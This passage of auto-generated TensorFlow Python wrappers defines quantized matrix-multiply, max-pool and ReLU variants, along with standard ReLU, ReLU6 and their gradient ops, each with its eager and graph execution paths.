def quantized_mat_mul_with_bias_and_relu_and_requantize_eager_fallback(a, b, bias, min_a, max_a, min_b, max_b, min_freezed_output, max_freezed_output, Toutput, transpose_a, transpose_b, input_quant_mode, name, ctx):
if Toutput is None:
Toutput = _dtypes.quint8
Toutput = _execute.make_type(Toutput, "Toutput")
if transpose_a is None:
transpose_a = False
transpose_a = _execute.make_bool(transpose_a, "transpose_a")
if transpose_b is None:
transpose_b = False
transpose_b = _execute.make_bool(transpose_b, "transpose_b")
if input_quant_mode is None:
input_quant_mode = "MIN_FIRST"
input_quant_mode = _execute.make_str(input_quant_mode, "input_quant_mode")
_attr_T1, (a,) = _execute.args_to_matching_eager([a], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_T2, (b,) = _execute.args_to_matching_eager([b], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tbias, (bias,) = _execute.args_to_matching_eager([bias], ctx, [_dtypes.float32, _dtypes.qint32, ])
min_a = _ops.convert_to_tensor(min_a, _dtypes.float32)
max_a = _ops.convert_to_tensor(max_a, _dtypes.float32)
min_b = _ops.convert_to_tensor(min_b, _dtypes.float32)
max_b = _ops.convert_to_tensor(max_b, _dtypes.float32)
min_freezed_output = _ops.convert_to_tensor(min_freezed_output, _dtypes.float32)
max_freezed_output = _ops.convert_to_tensor(max_freezed_output, _dtypes.float32)
_inputs_flat = [a, b, bias, min_a, max_a, min_b, max_b, min_freezed_output, max_freezed_output]
_attrs = ("T1", _attr_T1, "T2", _attr_T2, "Tbias", _attr_Tbias, "Toutput",
Toutput, "transpose_a", transpose_a, "transpose_b", transpose_b,
"input_quant_mode", input_quant_mode)
_result = _execute.execute(b"QuantizedMatMulWithBiasAndReluAndRequantize",
3, inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedMatMulWithBiasAndReluAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedMatMulWithBiasAndReluAndRequantizeOutput._make(_result)
return _result
_QuantizedMatMulWithBiasAndRequantizeOutput = collections.namedtuple(
"QuantizedMatMulWithBiasAndRequantize",
["out", "min_out", "max_out"])
def quantized_mat_mul_with_bias_and_requantize(a, b, bias, min_a, max_a, min_b, max_b, min_freezed_output, max_freezed_output, Toutput=_dtypes.quint8, transpose_a=False, transpose_b=False, input_quant_mode="MIN_FIRST", name=None):
r"""TODO: add doc.
Args:
a: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
b: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
bias: A `Tensor`. Must be one of the following types: `float32`, `qint32`.
min_a: A `Tensor` of type `float32`.
max_a: A `Tensor` of type `float32`.
min_b: A `Tensor` of type `float32`.
max_b: A `Tensor` of type `float32`.
min_freezed_output: A `Tensor` of type `float32`.
max_freezed_output: A `Tensor` of type `float32`.
Toutput: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.quint8`.
transpose_a: An optional `bool`. Defaults to `False`.
transpose_b: An optional `bool`. Defaults to `False`.
input_quant_mode: An optional `string` from: `"MIN_FIRST", "SCALED"`. Defaults to `"MIN_FIRST"`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (out, min_out, max_out).
out: A `Tensor` of type `Toutput`.
min_out: A `Tensor` of type `float32`.
max_out: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedMatMulWithBiasAndRequantize", name, a, b, bias, min_a,
max_a, min_b, max_b, min_freezed_output, max_freezed_output,
"Toutput", Toutput, "transpose_a", transpose_a, "transpose_b",
transpose_b, "input_quant_mode", input_quant_mode)
_result = _QuantizedMatMulWithBiasAndRequantizeOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_mat_mul_with_bias_and_requantize_eager_fallback(
a, b, bias, min_a, max_a, min_b, max_b, min_freezed_output,
max_freezed_output, Toutput=Toutput, transpose_a=transpose_a,
transpose_b=transpose_b, input_quant_mode=input_quant_mode,
name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if Toutput is None:
Toutput = _dtypes.quint8
Toutput = _execute.make_type(Toutput, "Toutput")
if transpose_a is None:
transpose_a = False
transpose_a = _execute.make_bool(transpose_a, "transpose_a")
if transpose_b is None:
transpose_b = False
transpose_b = _execute.make_bool(transpose_b, "transpose_b")
if input_quant_mode is None:
input_quant_mode = "MIN_FIRST"
input_quant_mode = _execute.make_str(input_quant_mode, "input_quant_mode")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedMatMulWithBiasAndRequantize", a=a, b=b, bias=bias,
min_a=min_a, max_a=max_a,
min_b=min_b, max_b=max_b,
min_freezed_output=min_freezed_output,
max_freezed_output=max_freezed_output,
Toutput=Toutput,
transpose_a=transpose_a,
transpose_b=transpose_b,
input_quant_mode=input_quant_mode,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T1", _op._get_attr_type("T1"), "T2", _op._get_attr_type("T2"),
"Tbias", _op._get_attr_type("Tbias"), "Toutput",
_op._get_attr_type("Toutput"), "transpose_a",
_op._get_attr_bool("transpose_a"), "transpose_b",
_op._get_attr_bool("transpose_b"), "input_quant_mode",
_op.get_attr("input_quant_mode"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedMatMulWithBiasAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedMatMulWithBiasAndRequantizeOutput._make(_result)
return _result
QuantizedMatMulWithBiasAndRequantize = tf_export("raw_ops.QuantizedMatMulWithBiasAndRequantize")(_ops.to_raw_op(quantized_mat_mul_with_bias_and_requantize))
def quantized_mat_mul_with_bias_and_requantize_eager_fallback(a, b, bias, min_a, max_a, min_b, max_b, min_freezed_output, max_freezed_output, Toutput, transpose_a, transpose_b, input_quant_mode, name, ctx):
if Toutput is None:
Toutput = _dtypes.quint8
Toutput = _execute.make_type(Toutput, "Toutput")
if transpose_a is None:
transpose_a = False
transpose_a = _execute.make_bool(transpose_a, "transpose_a")
if transpose_b is None:
transpose_b = False
transpose_b = _execute.make_bool(transpose_b, "transpose_b")
if input_quant_mode is None:
input_quant_mode = "MIN_FIRST"
input_quant_mode = _execute.make_str(input_quant_mode, "input_quant_mode")
_attr_T1, (a,) = _execute.args_to_matching_eager([a], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_T2, (b,) = _execute.args_to_matching_eager([b], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tbias, (bias,) = _execute.args_to_matching_eager([bias], ctx, [_dtypes.float32, _dtypes.qint32, ])
min_a = _ops.convert_to_tensor(min_a, _dtypes.float32)
max_a = _ops.convert_to_tensor(max_a, _dtypes.float32)
min_b = _ops.convert_to_tensor(min_b, _dtypes.float32)
max_b = _ops.convert_to_tensor(max_b, _dtypes.float32)
min_freezed_output = _ops.convert_to_tensor(min_freezed_output, _dtypes.float32)
max_freezed_output = _ops.convert_to_tensor(max_freezed_output, _dtypes.float32)
_inputs_flat = [a, b, bias, min_a, max_a, min_b, max_b, min_freezed_output, max_freezed_output]
_attrs = ("T1", _attr_T1, "T2", _attr_T2, "Tbias", _attr_Tbias, "Toutput",
Toutput, "transpose_a", transpose_a, "transpose_b", transpose_b,
"input_quant_mode", input_quant_mode)
_result = _execute.execute(b"QuantizedMatMulWithBiasAndRequantize", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedMatMulWithBiasAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedMatMulWithBiasAndRequantizeOutput._make(_result)
return _result
_QuantizedMaxPoolOutput = collections.namedtuple(
"QuantizedMaxPool",
["output", "min_output", "max_output"])
def quantized_max_pool(input, min_input, max_input, ksize, strides, padding, name=None):
r"""Produces the max pool of the input tensor for quantized types.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
The 4D (batch x rows x cols x depth) Tensor to MaxReduce over.
min_input: A `Tensor` of type `float32`.
The float value that the lowest quantized input value represents.
max_input: A `Tensor` of type `float32`.
The float value that the highest quantized input value represents.
ksize: A list of `ints`.
The size of the window for each dimension of the input tensor.
The length must be 4 to match the number of dimensions of the input.
strides: A list of `ints`.
The stride of the sliding window for each dimension of the input
tensor. The length must be 4 to match the number of dimensions of the input.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor`. Has the same type as `input`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedMaxPool", name, input, min_input, max_input, "ksize",
ksize, "strides", strides, "padding", padding)
_result = _QuantizedMaxPoolOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_max_pool_eager_fallback(
input, min_input, max_input, ksize=ksize, strides=strides,
padding=padding, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'quantized_max_pool' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_max_pool' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedMaxPool", input=input, min_input=min_input,
max_input=max_input, ksize=ksize, strides=strides,
padding=padding, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "ksize", _op.get_attr("ksize"),
"strides", _op.get_attr("strides"), "padding",
_op.get_attr("padding"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedMaxPool", _inputs_flat, _attrs, _result)
_result = _QuantizedMaxPoolOutput._make(_result)
return _result
QuantizedMaxPool = tf_export("raw_ops.QuantizedMaxPool")(_ops.to_raw_op(quantized_max_pool))
def quantized_max_pool_eager_fallback(input, min_input, max_input, ksize, strides, padding, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'quantized_max_pool' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_max_pool' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
_attr_T, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
_inputs_flat = [input, min_input, max_input]
_attrs = ("T", _attr_T, "ksize", ksize, "strides", strides, "padding",
padding)
_result = _execute.execute(b"QuantizedMaxPool", 3, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedMaxPool", _inputs_flat, _attrs, _result)
_result = _QuantizedMaxPoolOutput._make(_result)
return _result
_QuantizedReluOutput = collections.namedtuple(
"QuantizedRelu",
["activations", "min_activations", "max_activations"])
def quantized_relu(features, min_features, max_features, out_type=_dtypes.quint8, name=None):
r"""Computes Quantized Rectified Linear: `max(features, 0)`
Args:
features: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
min_features: A `Tensor` of type `float32`.
The float value that the lowest quantized value represents.
max_features: A `Tensor` of type `float32`.
The float value that the highest quantized value represents.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.quint8`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (activations, min_activations, max_activations).
activations: A `Tensor` of type `out_type`.
min_activations: A `Tensor` of type `float32`.
max_activations: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedRelu", name, features, min_features, max_features,
"out_type", out_type)
_result = _QuantizedReluOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_relu_eager_fallback(
features, min_features, max_features, out_type=out_type, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedRelu", features=features, min_features=min_features,
max_features=max_features, out_type=out_type,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "out_type",
_op._get_attr_type("out_type"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedRelu", _inputs_flat, _attrs, _result)
_result = _QuantizedReluOutput._make(_result)
return _result
QuantizedRelu = tf_export("raw_ops.QuantizedRelu")(_ops.to_raw_op(quantized_relu))
def quantized_relu_eager_fallback(features, min_features, max_features, out_type, name, ctx):
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
_attr_Tinput, (features,) = _execute.args_to_matching_eager([features], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
min_features = _ops.convert_to_tensor(min_features, _dtypes.float32)
max_features = _ops.convert_to_tensor(max_features, _dtypes.float32)
_inputs_flat = [features, min_features, max_features]
_attrs = ("Tinput", _attr_Tinput, "out_type", out_type)
_result = _execute.execute(b"QuantizedRelu", 3, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedRelu", _inputs_flat, _attrs, _result)
_result = _QuantizedReluOutput._make(_result)
return _result
_QuantizedRelu6Output = collections.namedtuple(
"QuantizedRelu6",
["activations", "min_activations", "max_activations"])
def quantized_relu6(features, min_features, max_features, out_type=_dtypes.quint8, name=None):
r"""Computes Quantized Rectified Linear 6: `min(max(features, 0), 6)`
Args:
features: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
min_features: A `Tensor` of type `float32`.
The float value that the lowest quantized value represents.
max_features: A `Tensor` of type `float32`.
The float value that the highest quantized value represents.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.quint8`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (activations, min_activations, max_activations).
activations: A `Tensor` of type `out_type`.
min_activations: A `Tensor` of type `float32`.
max_activations: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedRelu6", name, features, min_features, max_features,
"out_type", out_type)
_result = _QuantizedRelu6Output._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_relu6_eager_fallback(
features, min_features, max_features, out_type=out_type, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedRelu6", features=features, min_features=min_features,
max_features=max_features, out_type=out_type,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "out_type",
_op._get_attr_type("out_type"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedRelu6", _inputs_flat, _attrs, _result)
_result = _QuantizedRelu6Output._make(_result)
return _result
QuantizedRelu6 = tf_export("raw_ops.QuantizedRelu6")(_ops.to_raw_op(quantized_relu6))
def quantized_relu6_eager_fallback(features, min_features, max_features, out_type, name, ctx):
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
_attr_Tinput, (features,) = _execute.args_to_matching_eager([features], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
min_features = _ops.convert_to_tensor(min_features, _dtypes.float32)
max_features = _ops.convert_to_tensor(max_features, _dtypes.float32)
_inputs_flat = [features, min_features, max_features]
_attrs = ("Tinput", _attr_Tinput, "out_type", out_type)
_result = _execute.execute(b"QuantizedRelu6", 3, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedRelu6", _inputs_flat, _attrs, _result)
_result = _QuantizedRelu6Output._make(_result)
return _result
_QuantizedReluXOutput = collections.namedtuple(
"QuantizedReluX",
["activations", "min_activations", "max_activations"])
def quantized_relu_x(features, max_value, min_features, max_features, out_type=_dtypes.quint8, name=None):
r"""Computes Quantized Rectified Linear X: `min(max(features, 0), max_value)`
Args:
features: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
max_value: A `Tensor` of type `float32`.
min_features: A `Tensor` of type `float32`.
The float value that the lowest quantized value represents.
max_features: A `Tensor` of type `float32`.
The float value that the highest quantized value represents.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.quint8`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (activations, min_activations, max_activations).
activations: A `Tensor` of type `out_type`.
min_activations: A `Tensor` of type `float32`.
max_activations: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedReluX", name, features, max_value, min_features,
max_features, "out_type", out_type)
_result = _QuantizedReluXOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_relu_x_eager_fallback(
features, max_value, min_features, max_features, out_type=out_type,
name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedReluX", features=features, max_value=max_value,
min_features=min_features,
max_features=max_features, out_type=out_type,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "out_type",
_op._get_attr_type("out_type"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedReluX", _inputs_flat, _attrs, _result)
_result = _QuantizedReluXOutput._make(_result)
return _result
QuantizedReluX = tf_export("raw_ops.QuantizedReluX")(_ops.to_raw_op(quantized_relu_x))
def quantized_relu_x_eager_fallback(features, max_value, min_features, max_features, out_type, name, ctx):
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
_attr_Tinput, (features,) = _execute.args_to_matching_eager([features], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
max_value = _ops.convert_to_tensor(max_value, _dtypes.float32)
min_features = _ops.convert_to_tensor(min_features, _dtypes.float32)
max_features = _ops.convert_to_tensor(max_features, _dtypes.float32)
_inputs_flat = [features, max_value, min_features, max_features]
_attrs = ("Tinput", _attr_Tinput, "out_type", out_type)
_result = _execute.execute(b"QuantizedReluX", 3, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedReluX", _inputs_flat, _attrs, _result)
_result = _QuantizedReluXOutput._make(_result)
return _result
@_dispatch.add_dispatch_list
@tf_export('nn.relu')
def relu(features, name=None):
r"""Computes rectified linear: `max(features, 0)`.
See: https://en.wikipedia.org/wiki/Rectifier_(neural_networks)
Example usage:
>>> tf.nn.relu([-2., 0., -0., 3.]).numpy()
array([ 0., 0., -0., 3.], dtype=float32)
Args:
features: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`, `qint8`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `features`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Relu", name, features)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return relu_eager_fallback(
features, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
relu, (), dict(features=features, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Relu", features=features, name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
relu, (), dict(features=features, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Relu", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Relu = tf_export("raw_ops.Relu")(_ops.to_raw_op(relu))
def relu_eager_fallback(features, name, ctx):
_attr_T, (features,) = _execute.args_to_matching_eager([features], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, _dtypes.qint8, ])
_inputs_flat = [features]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"Relu", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Relu", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def relu6(features, name=None):
r"""Computes rectified linear 6: `min(max(features, 0), 6)`.
Args:
features: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `features`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Relu6", name, features)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return relu6_eager_fallback(
features, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Relu6", features=features, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Relu6", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Relu6 = tf_export("raw_ops.Relu6")(_ops.to_raw_op(relu6))
def relu6_eager_fallback(features, name, ctx):
_attr_T, (features,) = _execute.args_to_matching_eager([features], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
_inputs_flat = [features]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"Relu6", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Relu6", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def relu6_grad(gradients, features, name=None):
r"""Computes rectified linear 6 gradients for a Relu6 operation.
Args:
gradients: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
The backpropagated gradients to the corresponding Relu6 operation.
features: A `Tensor`. Must have the same type as `gradients`.
The features passed as input to the corresponding Relu6 operation, or
its output; using either one produces the same result.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `gradients`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Relu6Grad", name, gradients, features)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return relu6_grad_eager_fallback(
gradients, features, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Relu6Grad", gradients=gradients, features=features, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Relu6Grad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Relu6Grad = tf_export("raw_ops.Relu6Grad")(_ops.to_raw_op(relu6_grad))
def relu6_grad_eager_fallback(gradients, features, name, ctx):
_attr_T, _inputs_T = _execute.args_to_matching_eager([gradients, features], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
(gradients, features) = _inputs_T
_inputs_flat = [gradients, features]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"Relu6Grad", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Relu6Grad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def relu_grad(gradients, features, name=None):
r"""Computes rectified linear gradients for a Relu operation.
Args:
gradients: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
The backpropagated gradients to the corresponding Relu operation.
features: A `Tensor`. Must have the same type as `gradients`.
The features passed as input to the corresponding Relu operation, OR
the outputs of that operation (both work equivalently).
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `gradients`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "ReluGrad", name, gradients, features)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return relu_grad_eager_fallback(
gradients, features, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"ReluGrad", gradients=gradients, features=features, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"ReluGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
ReluGrad = tf_export("raw_ops.ReluGrad")(_ops.to_raw_op(relu_grad))
def relu_grad_eager_fallback(gradients, features, name, ctx):
_attr_T, _inputs_T = _execute.args_to_matching_eager([gradients, features], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
(gradients, features) = _inputs_T
_inputs_flat = [gradients, features]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"ReluGrad", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"ReluGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
@_dispatch.add_dispatch_list
@tf_export('nn.selu')
def selu(features, name=None):
r"""Computes scaled exponential linear: `scale * alpha * (exp(features) - 1)`
if < 0, `scale * features` otherwise.
To be used together with
`initializer = tf.variance_scaling_initializer(factor=1.0, mode='FAN_IN')`.
For correct dropout, use `tf.contrib.nn.alpha_dropout`.
See [Self-Normalizing Neural Networks](https://arxiv.org/abs/1706.02515)
Args:
